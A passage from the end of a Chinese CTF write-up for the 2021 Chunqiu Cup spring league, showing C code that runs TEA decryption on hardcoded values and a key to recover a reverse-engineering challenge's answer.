        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
        sum -= delta;
    }                                              /* end cycle */
    v[0]=v0; v[1]=v1;
}
 
int main()
{
    uint32_t v[2]={3775107838,3138262082},k[4]={3735928559,3405691582,269488144,16843009};
    // v为要加密的数据是两个32位无符号整数
    // k为加密解密密钥,为4个32位无符号整数,即密钥长度为128位

    decrypt(v, k);
    printf(",%u,%un",v[0],v[1]);
    return 0;
}
2021年春秋杯春季联赛部分WriteUp
image-20210529171403840


本文始发于微信公众号(山警网络空间安全与电子数据取证):2021年春秋杯春季联赛部分WriteUp

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: